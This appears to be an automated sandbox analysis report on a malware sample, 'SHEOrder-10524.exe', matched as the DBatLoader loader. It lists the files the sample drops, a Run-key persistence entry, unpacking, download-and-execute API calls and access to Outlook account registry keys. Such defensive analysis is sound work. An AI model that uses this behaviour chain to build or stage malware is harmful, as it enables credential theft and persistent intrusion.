                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: SHEOrder-10524.exeStatic file information: File size 1646592 > 1048576
                  Source: SHEOrder-10524.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x114c00
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
                  Source: Binary string: easinvoker.pdbH source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmp, SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, lhgtogaW.pif, 00000004.00000002.4137990797.0000000000B40000.00000040.00000400.00020000.00000000.sdmp, lhgtogaW.pif, 0000000A.00000001.1882448821.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, lhgtogaW.pif, 0000000E.00000001.1938580336.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifUnpacked PE file: 4.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifUnpacked PE file: 5.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifUnpacked PE file: 6.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifUnpacked PE file: 7.2.lhgtogaW.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifUnpacked PE file: 4.2.lhgtogaW.pif.400000.0.unpack
                  Yara detected DBatLoader
                  Source: Yara matchFile source: 0.2.SHEOrder-10524.exe.28c0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1719936963.0000000002315000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1942171245.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: lhgtogaW.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028D7AC0
                  Source: easinvoker.exe.0.drStatic PE information: section name: .imrsiv
                  Source: netutils.dll.0.drStatic PE information: section name: .xdata
                  Source: netutils.dll.0.drStatic PE information: section name: /4
                  Source: netutils.dll.0.drStatic PE information: section name: /19
                  Source: netutils.dll.0.drStatic PE information: section name: /31
                  Source: netutils.dll.0.drStatic PE information: section name: /45
                  Source: netutils.dll.0.drStatic PE information: section name: /57
                  Source: netutils.dll.0.drStatic PE information: section name: /70
                  Source: netutils.dll.0.drStatic PE information: section name: /81
                  Source: netutils.dll.0.drStatic PE information: section name: /92
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028EA2F4 push 028EA35Fh; ret 0_2_028EA357
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C32F0 push eax; ret 0_2_028C332C
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DD20C push ecx; mov dword ptr [esp], edx0_2_028DD211
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C6374 push 028C63CFh; ret 0_2_028C63C7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C6372 push 028C63CFh; ret 0_2_028C63C7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028EA0AC push 028EA125h; ret 0_2_028EA11D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D3028 push 028D3075h; ret 0_2_028D306D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D3027 push 028D3075h; ret 0_2_028D306D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028EA1F8 push 028EA288h; ret 0_2_028EA280
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028EA144 push 028EA1ECh; ret 0_2_028EA1E4
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C673E push 028C6782h; ret 0_2_028C677A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C6740 push 028C6782h; ret 0_2_028C677A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028CC528 push ecx; mov dword ptr [esp], edx0_2_028CC52D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028CD55C push 028CD588h; ret 0_2_028CD580
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028CCBA8 push 028CCD2Eh; ret 0_2_028CCD26
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D9B58 push 028D9B90h; ret 0_2_028D9B88
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028E9B70 push 028E9D8Eh; ret 0_2_028E9D86
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D78C8 push 028D7945h; ret 0_2_028D793D
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028CC8D6 push 028CCD2Eh; ret 0_2_028CCD26
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D6904 push 028D69AFh; ret 0_2_028D69A7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D6902 push 028D69AFh; ret 0_2_028D69A7
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D5E38 push ecx; mov dword ptr [esp], edx0_2_028D5E3A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D2F1C push 028D2F92h; ret 0_2_028D2F8A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028EDF18 push eax; ret 0_2_028EDFE8
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7CA8 push 028D7CE0h; ret 0_2_028D7CD8
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7CA6 push 028D7CE0h; ret 0_2_028D7CD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00457106 push ecx; ret 4_2_00457119
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0045B11A push esp; ret 4_2_0045B141
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00457A28 push eax; ret 4_2_00457A46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00434E56 push ecx; ret 4_2_00434E69
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274C2806 push ecx; ret 4_2_274C2819

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with a suspicious file extension
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile created: C:\Users\Public\Libraries\lhgtogaW.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Wagotghl.PIFJump to dropped file
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00406EB0 ShellExecuteW,URLDownloadToFileW,4_2_00406EB0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile created: C:\Users\Public\Libraries\lhgtogaW.pifJump to dropped file
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Wagotghl.PIFJump to dropped file
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_0041AA4A
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WagotghlJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WagotghlJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D9B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_028D9B94
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\Public\Libraries\Wagotghl.PIFRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
